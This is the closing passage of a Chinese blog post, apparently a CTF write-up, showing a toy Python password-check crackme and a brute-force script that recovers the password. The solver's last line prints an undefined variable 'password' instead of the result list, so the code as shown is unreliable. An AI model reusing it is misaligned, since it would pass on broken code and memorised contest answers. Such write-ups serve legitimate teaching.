<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line">user_submitted = raw_input(<span class="string">"Enter Password: "</span>)</span><br><span class="line"><span class="keyword">if</span> len(user_submitted) != <span class="number">10</span>:</span><br><span class="line">  <span class="keyword">print</span> <span class="string">"Wrong"</span></span><br><span class="line">  exit()</span><br><span class="line"></span><br><span class="line"><span class="comment">#条件一输入的密码长度等于10</span></span><br><span class="line"></span><br><span class="line">verify_arr = [<span class="number">193</span>, <span class="number">35</span>, <span class="number">9</span>, <span class="number">33</span>, <span class="number">1</span>, <span class="number">9</span>, <span class="number">3</span>, <span class="number">33</span>, <span class="number">9</span>, <span class="number">225</span>]</span><br><span class="line">user_arr = []</span><br><span class="line"><span class="keyword">for</span> char <span class="keyword">in</span> user_submitted:</span><br><span class="line">  <span class="comment"># '&lt;&lt;' is left bit shift</span></span><br><span class="line">  <span class="comment"># '&gt;&gt;' is right bit shift</span></span><br><span class="line">  <span class="comment"># '|' is bit-wise or</span></span><br><span class="line">  <span class="comment"># '^' is bit-wise xor</span></span><br><span class="line">  <span class="comment"># '&amp;' is bit-wise and</span></span><br><span class="line">  user_arr.append( (((ord(char) &lt;&lt; <span class="number">5</span>) | (ord(char) &gt;&gt; <span class="number">3</span>)) ^ <span class="number">111</span>) &amp; <span class="number">255</span> )</span><br><span class="line">  </span><br><span class="line">  <span class="comment">#这里验证输入的密码，所以我们就可以根据验证条件爆破出密码</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (user_arr == verify_arr):</span><br><span class="line">  <span class="keyword">print</span> <span class="string">"Success"</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">  <span class="keyword">print</span> <span class="string">"Wrong"</span></span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">verify_arr = [<span class="number">193</span>, <span class="number">35</span>, <span class="number">9</span>, <span class="number">33</span>, <span class="number">1</span>, <span class="number">9</span>, <span class="number">3</span>, <span class="number">33</span>, <span class="number">9</span>, <span class="number">225</span>]</span><br><span class="line">user_arr = [<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">128</span>):</span><br><span class="line">        <span class="keyword">if</span> verify_arr[i] == (((j&lt;&lt; <span class="number">5</span> | j&gt;&gt; <span class="number">3</span>) ^ <span class="number">111</span>) &amp; <span class="number">255</span>):</span><br><span class="line">            user_arr[i] = chr(j) <span class="comment">#转换为字母</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="keyword">print</span> password</span><br></pre></td></tr></table></figure>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><blockquote>
<p>感觉这比赛和考试是一样的，无论考试试卷简单还是难，就很难考100分<br>我们都能从两种试卷中学到一些东西</p>
</blockquote>
<p><span style="color:red;">Follow heart and desperate for freedom!</span></p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/ctf/">ctf</a>
            
              <a href="/tags/writeup/">writeup</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2017/06/10/seacms最新版前台getshell/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">seacms最新版前台getshell</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    
    
      <a class="next" href="/2017/06/05/吐血的部署/">
        <span class="next-text nav-default">吐血的部署</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/06/07/CUMT2017赛宁杯/';
        this.page.identifier = '2017/06/07/CUMT2017赛宁杯/';
        this.page.title = 'CUMT2017赛宁杯';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
